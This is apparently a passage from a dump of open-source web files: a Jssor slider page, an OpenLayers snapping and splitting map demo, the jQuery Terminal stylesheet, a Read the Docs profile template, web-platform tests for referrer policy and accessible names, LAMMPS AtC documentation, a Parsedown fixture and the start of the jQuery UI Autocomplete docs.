var jssor_slider1 = new $JssorSlider$(containerId, options);
//responsive code begin
//you can remove responsive code if you don't want the slider scales while window resizes
function ScaleSlider() {
var parentWidth = jssor_slider1.$Elmt.parentNode.clientWidth;
if (parentWidth)
jssor_slider1.$ScaleWidth(Math.min(parentWidth, 980));
else
$Jssor$.$Delay(ScaleSlider, 30);
}
ScaleSlider();
$Jssor$.$AddEvent(window, "load", ScaleSlider);
$Jssor$.$AddEvent(window, "resize", $Jssor$.$WindowResizeFilter(window, ScaleSlider));
$Jssor$.$AddEvent(window, "orientationchange", ScaleSlider);
//responsive code end
};
</script>
<!-- Jssor Slider Begin -->
<!-- To move inline styles to css file/block, please specify a class name for each element. -->
<div id="slider1_container" style="position: relative; top: 0px; left: 0px; width: 980px; height: 100px; overflow: hidden; ">
<!-- Loading Screen -->
<div u="loading" style="position: absolute; top: 0px; left: 0px;">
<div style="filter: alpha(opacity=70); opacity:0.7; position: absolute; display: block;
background-color: #000; top: 0px; left: 0px;width: 100%;height:100%;">
</div>
<div style="position: absolute; display: block; background: url(../img/loading.gif) no-repeat center center;
top: 0px; left: 0px;width: 100%;height:100%;">
</div>
</div>
<!-- Slides Container -->
<div u="slides" style="cursor: move; position: absolute; left: 0px; top: 0px; width: 980px; height: 100px; overflow: hidden;">
<div><img u="image" alt="amazon" src="../img/logo/amazon.jpg" /></div>
<div><img u="image" alt="android" src="../img/logo/android.jpg" /></div>
<div><img u="image" alt="bitly" src="../img/logo/bitly.jpg" /></div>
<div><img u="image" alt="blogger" src="../img/logo/blogger.jpg" /></div>
<div><img u="image" alt="dnn" src="../img/logo/dnn.jpg" /></div>
<div><img u="image" alt="drupal" src="../img/logo/drupal.jpg" /></div>
<div><img u="image" alt="ebay" src="../img/logo/ebay.jpg" /></div>
<div><img u="image" alt="facebook" src="../img/logo/facebook.jpg" /></div>
<div><img u="image" alt="google" src="../img/logo/google.jpg" /></div>
<div><img u="image" alt="ibm" src="../img/logo/ibm.jpg" /></div>
<div><img u="image" alt="ios" src="../img/logo/ios.jpg" /></div>
<div><img u="image" alt="joomla" src="../img/logo/joomla.jpg" /></div>
<div><img u="image" alt="linkedin" src="../img/logo/linkedin.jpg" /></div>
<div><img u="image" alt="mac" src="../img/logo/mac.jpg" /></div>
<div><img u="image" alt="magento" src="../img/logo/magento.jpg" /></div>
<div><img u="image" alt="pinterest" src="../img/logo/pinterest.jpg" /></div>
<div><img u="image" alt="samsung" src="../img/logo/samsung.jpg" /></div>
<div><img u="image" alt="twitter" src="../img/logo/twitter.jpg" /></div>
<div><img u="image" alt="windows" src="../img/logo/windows.jpg" /></div>
<div><img u="image" alt="wordpress" src="../img/logo/wordpress.jpg" /></div>
<div><img u="image" alt="youtube" src="../img/logo/youtube.jpg" /></div>
</div>
<a style="display: none" href="http://www.jssor.com">Image Slider</a>
<!-- Trigger -->
<script>
jssor_slider1_starter('slider1_container');
</script>
</div>
<!-- Jssor Slider End -->
</body>
</html>
|
web/js/openlayers/examples/snap-split.html
|
spatindsaongo/geos
|
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Snapping & Splitting</title>
<link rel="stylesheet" href="../theme/default/style.css" type="text/css" />
<link rel="stylesheet" href="style.css" type="text/css" />
<style type="text/css">
.olControlEditingToolbar .olControlModifyFeatureItemInactive {
background-position: -1px 0px ;
}
.olControlEditingToolbar .olControlModifyFeatureItemActive {
background-position: -1px -23px ;
}
label.head {
font-weight: bold;
padding: 1em 0 0.1em 0;
border-bottom: 1px solid grey;
}
td {
padding: 0.25em 1em;
}
tr.head td {
text-align: center;
font-weight: bold;
}
</style>
<script src="../lib/Firebug/firebug.js"></script>
<script src="../lib/OpenLayers.js"></script>
<script type="text/javascript">
OpenLayers.Feature.Vector.style['default']['strokeWidth'] = '2';
function init() {
initMap();
initUI();
}
var map, draw, modify, snap, split, vectors;
function initMap() {
map = new OpenLayers.Map('map');
var styles = new OpenLayers.StyleMap({
"default": new OpenLayers.Style(null, {
rules: [
new OpenLayers.Rule({
symbolizer: {
"Point": {
pointRadius: 5,
graphicName: "square",
fillColor: "white",
fillOpacity: 0.25,
strokeWidth: 1,
strokeOpacity: 1,
strokeColor: "#333333"
},
"Line": {
strokeWidth: 3,
strokeOpacity: 1,
strokeColor: "#666666"
}
}
})
]
}),
"select": new OpenLayers.Style({
strokeColor: "#00ccff",
strokeWidth: 4
}),
"temporary": new OpenLayers.Style(null, {
rules: [
new OpenLayers.Rule({
symbolizer: {
"Point": {
pointRadius: 5,
graphicName: "square",
fillColor: "white",
fillOpacity: 0.25,
strokeWidth: 1,
strokeOpacity: 1,
strokeColor: "#333333"
},
"Line": {
strokeWidth: 3,
strokeOpacity: 1,
strokeColor: "#00ccff"
}
}
})
]
})
});
// create three vector layers
vectors = new OpenLayers.Layer.Vector("Lines", {
isBaseLayer: true,
strategies: [new OpenLayers.Strategy.Fixed()],
protocol: new OpenLayers.Protocol.HTTP({
url: "data/roads.json",
format: new OpenLayers.Format.GeoJSON()
}),
styleMap: styles,
maxExtent: new OpenLayers.Bounds(
1549471.9221, 6403610.94, 1550001.32545, 6404015.8
)
});
map.addLayer(vectors);
// configure the snapping agent
snap = new OpenLayers.Control.Snapping({layer: vectors});
map.addControl(snap);
snap.activate();
// configure split agent
split = new OpenLayers.Control.Split({
layer: vectors,
source: vectors,
tolerance: 0.0001,
eventListeners: {
aftersplit: function(event) {
flashFeatures(event.features);
}
}
});
map.addControl(split);
split.activate();
// add some editing tools to a panel
var panel = new OpenLayers.Control.Panel({
displayClass: "olControlEditingToolbar"
});
draw = new OpenLayers.Control.DrawFeature(
vectors, OpenLayers.Handler.Path,
{displayClass: "olControlDrawFeaturePoint", title: "Draw Features"}
);
modify = new OpenLayers.Control.ModifyFeature(
vectors, {displayClass: "olControlModifyFeature", title: "Modify Features"}
);
panel.addControls([
new OpenLayers.Control.Navigation({title: "Navigate"}),
draw, modify
]);
map.addControl(panel);
map.addControl(new OpenLayers.Control.MousePosition());
map.zoomToMaxExtent();
}
function flashFeatures(features, index) {
if(!index) {
index = 0;
}
var current = features[index];
if(current && current.layer === vectors) {
vectors.drawFeature(features[index], "select");
}
var prev = features[index-1];
if(prev && prev.layer === vectors) {
vectors.drawFeature(prev, "default");
}
++index;
if(index <= features.length) {
window.setTimeout(function() {flashFeatures(features, index)}, 75);
}
}
/**
* Add behavior to page elements. This basically lets us set snapping
* target properties with the checkboxes and text inputs. The checkboxes
* toggle the target node, vertex, or edge (boolean) values. The
* text inputs set the nodeTolerance, vertexTolerance, or edgeTolerance
* property values.
*/
function initUI() {
// add behavior to snap elements
var snapCheck = $("snap_toggle");
snapCheck.checked = true;
snapCheck.onclick = function() {
if(snapCheck.checked) {
snap.activate();
$("snap_options").style.display = "block";
} else {
snap.deactivate();
$("snap_options").style.display = "none";
}
};
var target, type, tog, tol;
var types = ["node", "vertex", "edge"];
var target = snap.targets[0];
for(var j=0; j<types.length; ++j) {
type = types[j];
tog = $("target_" + type);
tog.checked = target[type];
tog.onclick = (function(tog, type, target) {
return function() {target[type] = tog.checked;}
})(tog, type, target);
tol = $("target_" + type + "Tolerance");
tol.value = target[type + "Tolerance"];
tol.onchange = (function(tol, type, target) {
return function() {
target[type + "Tolerance"] = Number(tol.value) || 0;
}
})(tol, type, target);
}
// add behavior to split elements
var splitCheck = $("split_toggle");
splitCheck.checked = true;
splitCheck.onclick = function() {
if(splitCheck.checked) {
split.activate();
$("split_options").style.display = "block";
} else {
split.deactivate();
$("split_options").style.display = "none";
}
};
var edgeCheck = $("edge_toggle");
edgeCheck.checked = split.edge;
edgeCheck.onclick = function() {
split.edge = edgeCheck.checked;
};
$("clear").onclick = function() {
modify.deactivate();
vectors.destroyFeatures();
};
}
</script>
</head>
<body onload="init()">
<h1 id="title">Snapping & Splitting Example</h1>
<div id="shortdesc">A demonstration snapping and splitting while editing vector features.</div>
<div id="map" class="smallmap"></div>
<br/>
<input type="checkbox" id="snap_toggle" />
<label for="snap_toggle" class="head">Enable Snapping</label>
<table id="snap_options">
<tbody>
<tr class="head">
<td>target</td><td>node</td><td>vertex</td><td>edge</td>
</tr>
<tr>
<td>roads</td>
<td><input type="checkbox" id="target_node" /><input id="target_nodeTolerance" type="text" size="3" /></td>
<td><input type="checkbox" id="target_vertex" /><input id="target_vertexTolerance" type="text" size="3" /></td>
<td><input type="checkbox" id="target_edge" /><input id="target_edgeTolerance" type="text" size="3" /></td>
</tr>
</tbody>
</table>
<br />
<input type="checkbox" id="split_toggle" />
<label for="split_toggle" class="head">Enable Splitting</label>
<table id="split_options">
<tbody>
<tr>
<td><label for="edge_toggle">edges split</label></td>
<td><input type="checkbox" id="edge_toggle" /></td>
</tr>
</tbody>
</table>
<br />
<button id="clear">clear</button> Clear all features.
</body>
</html>
|
files/jquery.terminal/1.0.1/jquery.terminal.css
|
Asaf-S/jsdelivr
|
/*!
* __ _____ ________ __
* / // _ /__ __ _____ ___ __ _/__ ___/__ ___ ______ __ __ __ ___ / /
* __ / // // // // // _ // _// // / / // _ // _// // // \/ // _ \/ /
* / / // // // // // ___// / / // / / // ___// / / / / // // /\ // // / /__
* \___//____ \\___//____//_/ _\_ / /_//____//_/ /_/ /_//_//_/ /_/ \__\_\___/
* \/ /____/ version DEV
* http://terminal.jcubic.pl
*
* This file is part of jQuery Terminal.
*
* Copyright (c) 2011-2017 Jakub Jankiewicz <http://jcubic.pl>
* Released under the MIT license
*
* Date: Sun, 05 Feb 2017 17:28:27 +0000
*/
.terminal .terminal-output .format, .cmd .format,
.cmd .prompt, .cmd .prompt div, .terminal .terminal-output div div{
display: inline-block;
}
.terminal h1, .terminal h2, .terminal h3, .terminal h4, .terminal h5, .terminal h6, .terminal pre, .cmd {
margin: 0;
}
.terminal h1, .terminal h2, .terminal h3, .terminal h4, .terminal h5, .terminal h6 {
line-height: 1.2em;
}
/*
.cmd .mask {
width: 10px;
height: 11px;
background: black;
z-index: 100;
}
*/
.cmd .clipboard {
position: absolute;
left: -16px;
top: 0;
width: 10px;
height: 16px;
/* this seems to work after all on Android */
/*left: -99999px;
clip: rect(1px,1px,1px,1px);
/* on desktop textarea appear when paste */
/*
opacity: 0.01;
filter: alpha(opacity = 0.01);
filter: progid:DXImageTransform.Microsoft.Alpha(opacity=0.01);
*/
background: transparent;
border: none;
color: transparent;
outline: none;
padding: 0;
resize: none;
z-index: 0;
overflow: hidden;
}
.terminal .error {
color: #f00;
}
.terminal {
position: relative;
/*overflow: hidden;*/
overflow-y: auto;
overflow-x: hidden;
}
.terminal > div {
height: 100%;
}
.cmd {
padding: 0;
height: 1.3em;
position: relative;
/*margin-top: 3px; */
}
.terminal .inverted, .cmd .inverted {
background-color: #aaa;
color: #000;
}
.cmd .cursor.blink {
-webkit-animation: terminal-blink 1s infinite steps(1, start);
-moz-animation: terminal-blink 1s infinite steps(1, start);
-ms-animation: terminal-blink 1s infinite steps(1, start);
animation: terminal-blink 1s infinite steps(1, start);
border-left: 1px solid transparent;
border-bottom: 3px solid transparent;
margin-left: -1px;
background-clip: content-box;
}
.bar.terminal .inverted, .bar.cmd .inverted {
border-left-color: #aaa;
}
@-webkit-keyframes terminal-blink {
0%, 100% {
background-color: #000;
color: #aaa;
}
50% {
background-color: #bbb;
color: #000;
}
}
@-ms-keyframes terminal-blink {
0%, 100% {
background-color: #000;
color: #aaa;
}
50% {
background-color: #bbb;
color: #000;
}
}
@-moz-keyframes terminal-blink {
0%, 100% {
background-color: #000;
color: #aaa;
}
50% {
background-color: #bbb;
color: #000;
}
}
@keyframes terminal-blink {
0%, 100% {
background-color: #000;
color: #aaa;
}
50% {
background-color: #bbb; /* not #aaa because it's seems there is Google Chrome bug */
color: #000;
}
}
@-webkit-keyframes terminal-bar {
0%, 100% {
border-left-color: #aaa;
}
50% {
border-left-color: #000;
}
}
@-ms-keyframes terminal-bar {
0%, 100% {
border-left-color: #aaa;
}
50% {
border-left-color: #000;
}
}
@-moz-keyframes terminal-bar {
0%, 100% {
border-left-color: #aaa;
}
50% {
border-left-color: #000;
}
}
@keyframes terminal-bar {
0%, 100% {
border-left-color: #aaa;
}
50% {
border-left-color: #000;
}
}
@-webkit-keyframes terminal-underline {
0%, 100% {
border-bottom-color: #aaa;
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
50% {
border-bottom-color: #000;
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
}
@-ms-keyframes terminal-underline {
0%, 100% {
border-bottom-color: #aaa;
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
50% {
border-bottom-color: #000;
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
}
@-moz-keyframes terminal-underline {
0%, 100% {
border-bottom-color: #aaa;
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
50% {
border-bottom-color: #000;
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
}
@keyframes terminal-underline {
0%, 100% {
border-bottom-color: #aaa;
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
50% {
border-bottom-color: #000;
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
}
.terminal .terminal-output div div, .cmd .prompt {
display: block;
line-height: 14px;
height: auto;
}
.cmd .prompt {
float: left;
}
.terminal, .cmd {
font-family: monospace;
/*font-family: FreeMono, monospace; this don't work on Android */
color: #aaa;
background-color: #000;
font-size: 12px;
line-height: 14px;
box-sizing: border-box;
}
.cmd div {
float: left;
clear: both;
}
.cmd div + span {
clear: both;
}
.cmd .prompt + div {
clear: right;
}
.terminal-output > div {
/*padding-top: 3px;*/
min-height: 14px;
}
.terminal-output > div > div * {
overflow-wrap: break-word; /* when echo html */
word-wrap: break-word;
}
.terminal .terminal-output div span {
display: inline-block;
}
.cmd span {
float: left;
}
/* fix double style of selecting text in terminal */
.terminal-output span, .terminal-output a, .cmd div, .cmd span, .terminal td,
.terminal pre, .terminal h1, .terminal h2, .terminal h3, .terminal h4,
.terminal h5, .terminal h6 {
-webkit-touch-callout: initial;
-webkit-user-select: text;
-khtml-user-select: text;
-moz-user-select: text;
-ms-user-select: text;
user-select: text;
}
.terminal, .terminal-output, .terminal-output div {
-webkit-touch-callout: none;
-webkit-user-select: none;
-khtml-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
}
/* firefox hack */
@-moz-document url-prefix() {
.terminal, .terminal-output, .terminal-output div {
-webkit-touch-callout: initial;
-webkit-user-select: initial;
-khtml-user-select: initial;
-moz-user-select: initial;
-ms-user-select: initial;
user-select: initial;
}
}
.terminal table {
border-collapse: collapse;
}
.terminal td {
border: 1px solid #aaa;
}
.terminal h1::-moz-selection,
.terminal h2::-moz-selection,
.terminal h3::-moz-selection,
.terminal h4::-moz-selection,
.terminal h5::-moz-selection,
.terminal h6::-moz-selection,
.terminal pre::-moz-selection,
.terminal td::-moz-selection,
.terminal .terminal-output div div::-moz-selection,
.terminal .terminal-output div span::-moz-selection,
.terminal .terminal-output div div a::-moz-selection,
.cmd div::-moz-selection,
.cmd > span::-moz-selection,
.cmd > span span::-moz-selection,
.cmd > div::-moz-selection,
.cmd > div span::-moz-selection,
.cmd .prompt span::-moz-selection {
background-color: #aaa;
color: #000;
}
/* this don't work in Chrome
.terminal tr td::-moz-selection {
border-color: #000;
}
.terminal tr td::selection {
border-color: #000;
}
*/
.terminal h1::selection,
.terminal h2::selection,
.terminal h3::selection,
.terminal h4::selection,
.terminal h5::selection,
.terminal h6::selection,
.terminal pre::selection,
.terminal td::selection,
.terminal .terminal-output div div::selection,
.terminal .terminal-output div div a::selection,
.terminal .terminal-output div span::selection,
.cmd div::selection,
.cmd > span::selection,
.cmd > span span::selection,
.cmd > div::selection,
.cmd > div span::selection,
.cmd .prompt span::selection {
/*
* use rgba to fix transparent selection in chrome
* http://stackoverflow.com/questions/7224445/css3-selection-behaves-differently-in-ff-chrome
*/
background-color: rgba(170, 170, 170, 0.99);
color: #000;
}
.terminal .terminal-output div.error, .terminal .terminal-output div.error div {
color: red;
}
.tilda {
position: fixed;
top: 0;
left: 0;
width: 100%;
z-index: 1100;
}
.clear {
clear: both;
}
.terminal a {
color: #0F60FF;
}
.terminal a:hover {
color: red;
}
.terminal iframe {
position: absolute;
left: 0;
top: -100%;
width: 100%;
height: 100%;
margin: 1px 0 0;
border: none;
opacity: 0;
pointer-events: none;
box-sizing: border-box;
}
.terminal, .terminal iframe {
padding: 10px; /* we get width of the terminal from iframe so it need to have the same padding */
}
@supports (--css: variables) {
.terminal, .cmd {
color: var(--color, #aaa);
background-color: var(--background, #000);
}
.terminal, .cmd, .terminal .terminal-output div div, .cmd .prompt {
font-size: calc(var(--size, 1) * 12px);
line-height: calc(var(--size, 1) * 14px);
}
.terminal .inverted, .cmd .inverted {
background-color: var(--color, #aaa);
color: var(--background, #000);
}
.cmd .cursor.blink {
-webkit-animation: var(--animation, terminal-blink) 1s infinite steps(1, start);
-moz-animation: var(--animation, terminal-blink) 1s infinite steps(1, start);
-ms-animation: var(--animation, terminal-blink) 1s infinite steps(1, start);
animation: var(--animation, terminal-blink) 1s infinite steps(1, start);
color: var(--color, #aaa);
background-color: var(--background, #000);
margin-bottom: -3px;
}
.terminal h1::-moz-selection,
.terminal h2::-moz-selection,
.terminal h3::-moz-selection,
.terminal h4::-moz-selection,
.terminal h5::-moz-selection,
.terminal h6::-moz-selection,
.terminal pre::-moz-selection,
.terminal td::-moz-selection,
.terminal .terminal-output div div::-moz-selection,
.terminal .terminal-output div span::-moz-selection,
.terminal .terminal-output div div a::-moz-selection,
.cmd div::-moz-selection,
.cmd > span::-moz-selection,
.cmd > span span::-moz-selection,
.cmd > div::-moz-selection,
.cmd > div span::-moz-selection,
.cmd .prompt span::-moz-selection {
background-color: var(--color, #aaa);
color: var(--background, #000);
}
.terminal h1::selection,
.terminal h2::selection,
.terminal h3::selection,
.terminal h4::selection,
.terminal h5::selection,
.terminal h6::selection,
.terminal pre::selection,
.terminal td::selection,
.terminal .terminal-output div div::selection,
.terminal .terminal-output div div a::selection,
.terminal .terminal-output div span::selection,
.cmd div::selection,
.cmd > span::selection,
.cmd > span span::selection,
.cmd > div::selection,
.cmd > div span::selection,
.cmd .prompt span::selection {
background-color: var(--color, rgba(170, 170, 170, 0.99));
color: var(--background, #000);
}
@-webkit-keyframes terminal-blink {
0%, 100% {
background-color: var(--background, #000);
color: var(--color, #aaa);
}
50% {
background-color: var(--color, #aaa);
color: var(--background, #000);
}
}
@-ms-keyframes terminal-blink {
0%, 100% {
background-color: var(--background, #000);
color: var(--color, #aaa);
}
50% {
background-color: var(--color, #aaa);
color: var(--background, #000);
}
}
@-moz-keyframes terminal-blink {
0%, 100% {
background-color: var(--background, #000);
color: var(--color, #aaa);
}
50% {
background-color: var(--color, #aaa);
color: var(--background, #000);
}
}
@keyframes terminal-blink {
0%, 100% {
background-color: var(--background, #000);
color: var(--color, #aaa);
}
50% {
background-color: var(--color, #aaa);
color: var(--background, #000);
}
}
@-webkit-keyframes terminal-bar {
0%, 100% {
border-left-color: var(--background, #000);
}
50% {
border-left-color: var(--color, #aaa);
}
}
@-ms-keyframes terminal-bar {
0%, 100% {
border-left-color: var(--background, #000);
}
50% {
border-left-color: var(--color, #aaa);
}
}
@-moz-keyframes terminal-bar {
0%, 100% {
border-left-color: var(--background, #000);
}
50% {
border-left-color: var(--color, #aaa);
}
}
@keyframes terminal-bar {
0%, 100% {
border-left-color: var(--background, #000);
}
50% {
border-left-color: var(--color, #aaa);
}
}
@-webkit-keyframes terminal-underline {
0%, 100% {
border-bottom-color: var(--color, #aaa);
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
50% {
border-bottom-color: var(--background, #000);
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
}
@-ms-keyframes terminal-underline {
0%, 100% {
border-bottom-color: var(--background, #000);
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
50% {
border-bottom-color: var(--color, #aaa);
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
}
@-moz-keyframes terminal-underline {
0%, 100% {
border-bottom-color: var(--background, #000);
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
50% {
border-bottom-color: var(--color, #aaa);
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
}
@keyframes terminal-underline {
0%, 100% {
border-bottom-color: var(--background, #000);
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
50% {
border-bottom-color: var(--color, #aaa);
position: relative;
top: 2px;
line-height: 11px;
border-left: none;
margin: 0;
}
}
}
|
readthedocs/templates/profiles/base_profile_edit.html
|
SteveViss/readthedocs.org
|
{% extends "base.html" %}
{% load i18n %}
{% load core_tags %}
{% load gravatar %}
{% block profile-bar-admin %}active{% endblock %}
{# This is included here instead of subclassing base_profile because we don't control all the views, and can't set the `profile` variable reliably #}
{% block subnav-bar %}
<!-- BEGIN project bar -->
<div id="project_bar">
<div class="wrapper">
<div class="project-title">
<h2>
<a href="{{ user.profile.get_absolute_url }}">
{% gravatar user.email 30 %}
</a>
{{ user }}
{% if user.get_full_name %}
({{ user.get_full_name}})
{% endif %}
</h2>
</div>
<div class="options">
<ul>
<li class="{% block profile-bar-profile %}{% endblock %}"><a href="{{ user.profile.get_absolute_url }}">{% trans "Profile" %}</a></li>
<li class="active"><a href="{% url "profiles_profile_edit" %}"><i class="gear"></i>{% trans "Admin" %}</a></li>
</ul>
</div>
</div>
</div>
<!-- END project bar -->
{% endblock %}
{% block content %}
<div id="project_edit" class="module">
<div class="wrapper">
<div class="navigable">
<ul>
<li class="{% block profile-admin-details %}{% endblock %}"><a href="{% url 'profiles_profile_edit' %}">{% trans "Details" %}</a></li>
<li class="{% block profile-admin-social-accounts %}{% endblock %}"><a href="{% url 'socialaccount_connections' %}">{% trans "Social Accounts" %}</a></li>
<li class="{% block profile-admin-change-password %}{% endblock %}"><a href="{% url 'account_change_password' %}">{% trans "Change Password" %}</a></li>
<li class="{% block profile-admin-change-email %}{% endblock %}"><a href="{% url 'account_email' %}">{% trans "Change Email" %}</a></li>
<li class="{% block profile-admin-gold-edit %}{% endblock %}"><a href="{% url 'gold_register' %}">{% trans "Gold" %}</a></li>
</ul>
<div>
<h2>{% block edit_content_header %}{% endblock %}</h2>
{% block edit_content %}
{% endblock %}
</div>
</div>
</div>
</div>
{% endblock %}
|
tests/wpt/web-platform-tests/referrer-policy/origin-only/attr-referrer/same-origin/http-http/img-tag/generic.keep-origin-redirect.http.html
|
raviflipsyde/servo
|
<!DOCTYPE html>
<!-- DO NOT EDIT! Generated by referrer-policy/generic/tools/generate.py using referrer-policy/generic/template/test.release.html.template. -->
<html>
<head>
<title>Referrer-Policy: Referrer Policy is set to 'origin-only'</title>
<meta name="description" content="Check that all subresources in all casses get only the origin portion of the referrer URL.">
<link rel="author" title="Kristijan Burnik" href="burnik@chromium.org">
<link rel="help" href="https://w3c.github.io/webappsec/specs/referrer-policy/#referrer-policy-state-origin">
<meta name="assert" content="The referrer URL is origin when a
document served over http requires an http
sub-resource via img-tag using the attr-referrer
delivery method with keep-origin-redirect and when
the target request is same-origin.">
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<!-- TODO(kristijanburnik): Minify and merge both: -->
<script src="/referrer-policy/generic/common.js"></script>
<script src="/referrer-policy/generic/referrer-policy-test-case.js?pipe=sub"></script>
</head>
<body>
<script>
ReferrerPolicyTestCase(
{
"referrer_policy": "origin",
"delivery_method": "attr-referrer",
"redirection": "keep-origin-redirect",
"origin": "same-origin",
"source_protocol": "http",
"target_protocol": "http",
"subresource": "img-tag",
"subresource_path": "/referrer-policy/generic/subresource/image.py",
"referrer_url": "origin"
},
document.querySelector("meta[name=assert]").content,
new SanityChecker()
).start();
</script>
<div id="log"></div>
</body>
</html>
|
libs/lammps/doc/src/USER/atc/man_output.html
|
ovilab/atomify-lammps
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<title>ATC: fix_modify AtC output</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<link href="doxygen.css" rel="stylesheet" type="text/css"/>
</head>
<body>
<!-- Generated by Doxygen 1.6.1 -->
<div class="navigation" id="top">
<div class="tabs">
<ul>
<li><a href="index.html"><span>Main Page</span></a></li>
<li class="current"><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
<li><a href="dirs.html"><span>Directories</span></a></li>
</ul>
</div>
</div>
<div class="contents">
<h1><a class="anchor" id="man_output">fix_modify AtC output </a></h1><h2><a class="anchor" id="syntax">
syntax</a></h2>
<p>fix_modify AtC output <filename_prefix> <frequency> [text | full_text | binary | vector_components | tensor_components ] fix_modify AtC output index [step | time ]</p>
<ul>
<li>filename_prefix (string) = prefix for data files</li>
<li>frequency (integer) = frequency of output in time-steps</li>
<li>options (keyword/s): <br/>
text = creates text output of index, step and nodal variable values for unique nodes <br/>
full_text = creates text output index, nodal id, step, nodal coordinates and nodal variable values for unique and image nodes <br/>
binary = creates binary Ensight output <br/>
vector_components = outputs vectors as scalar components <br/>
tensor_components = outputs tensor as scalar components (use this for Paraview)<br/>
</li>
</ul>
<h2><a class="anchor" id="examples">
examples</a></h2>
<p><code> fix_modify AtC output heatFE 100 </code> <br/>
<code> fix_modify AtC output hardyFE 1 text tensor_components </code> <br/>
<code> fix_modify AtC output hardyFE 10 text binary tensor_components </code> <br/>
<code> fix_modify AtC output index step </code> <br/>
</p>
<h2><a class="anchor" id="description">
description</a></h2>
<p>Creates text and/or binary (Ensight, "gold" format) output of nodal/mesh data which is transfer/physics specific. Output indexed by step or time is possible. </p>
<h2><a class="anchor" id="restrictions">
restrictions</a></h2>
<h2><a class="anchor" id="related">
related</a></h2>
<p>see <a class="el" href="man_fix_atc.html">fix atc command</a> </p>
<h2><a class="anchor" id="default">
default</a></h2>
<p>no default format output indexed by time </p>
</div>
<hr size="1"/><address style="text-align: right;"><small>Generated on 21 Aug 2013 for ATC by
<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.6.1 </small></address>
</body>
</html>
|
yii2/vendor/erusev/parsedown/test/data/compound_blockquote.html
|
Urbannet/cleanclean
|
<blockquote>
<h2>header</h2>
<p>paragraph</p>
<ul>
<li>li</li>
</ul>
<hr />
<p>paragraph</p>
</blockquote>
|
tests/wpt/web-platform-tests/accname/name_test_case_601-manual.html
|
UK992/servo
|
<!doctype html>
<html>
<head>
<title>Name test case 601</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<link rel="stylesheet" href="/wai-aria/scripts/manual.css">
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<script src="/wai-aria/scripts/ATTAcomm.js"></script>
<script>
setup({explicit_timeout: true, explicit_done: true });
var theTest = new ATTAcomm(
{
"steps" : [
{
"element" : "test",
"test" : {
"ATK" : [
[
"property",
"name",
"is",
"foo"
]
],
"AXAPI" : [
[
"property",
"AXDescription",
"is",
"foo"
]
],
"IAccessible2" : [
[
"property",
"accName",
"is",
"foo"
]
],
"UIA" : [
[
"property",
"Name",
"is",
"foo"
]
]
},
"title" : "step 1",
"type" : "test"
}
],
"title" : "Name test case 601"
}
) ;
</script>
</head>
<body>
<p>This test examines the ARIA properties for Name test case 601.</p>
<div id="test" role="button">foo</div>
<div id="manualMode"></div>
<div id="log"></div>
<div id="ATTAmessages"></div>
</body>
</html>
|
sites/all/modules/jquery_ui/jquery.ui/docs/autocomplete.html
|
patdunlavey/williamstownbeat
|
<ul class="UIAPIPlugin-toc">
<li><a href="#overview">Overview</a></li>
<li><a href="#options">Options</a></li>
<li><a href="#events">Events</a></li>
<li><a href="#methods">Methods</a></li>
<li><a href="#theming">Theming</a></li>
</ul>
<div class="UIAPIPlugin">
<h1>jQuery UI Autocomplete</h1>
<div id="overview">
<h2 class="top-header">Overview</h2>
<div id="overview-main">
<p>Autocomplete, when added to an input field, enables users to quickly find and select from a pre-populated list of values as they type, leveraging searching and filtering.</p>
<p>By giving an Autocomplete field focus or entering something into it, the plugin starts searching for entries that match and displays a list of values to choose from. By entering more characters, the user can filter down the list to better matches.</p>
<p>This can be used to enter previous selected values, for example you could use Autocomplete for entering tags, to complete an address, you could enter a city name and get the zip code, or maybe enter email addresses from an address book.</p>
<p>You can pull data in from a local and/or a remote source: Local is good for small data sets (like an address book with 50 entries), remote is necessary for big data sets, like a database with hundreds or millions of entries to select from.</p>
<p>Autocomplete can be customized to work with various data sources, by just specifying the source option. A data source can be:</p>
<ul>
<li>an Array with local data</li>
<li>a String, specifying a URL</li>
<li>a Callback</li>
</ul>
<p>The local data can be a simple Array of Strings, or it contains Objects for each item in the array, with either a label or value property or both. The label property is displayed in the suggestion menu. The value will be inserted into the input element after the user selected something from the menu. If just one property is specified, it will be used for both, eg. if you provide only value-properties, the value will also be used as the label.</p>
<p>When a String is used, the Autocomplete plugin expects that string to point to a URL resource that will return JSON data. It can be on the same host or on a different one (must provide JSONP). The request parameter "term" gets added to that URL. The data itself can be in the same format as the local data described above.</p>
<p>The third variation, the callback, provides the most flexibility, and can be used to connect any data source to Autocomplete. The callback gets two arguments:</p>
<ul>
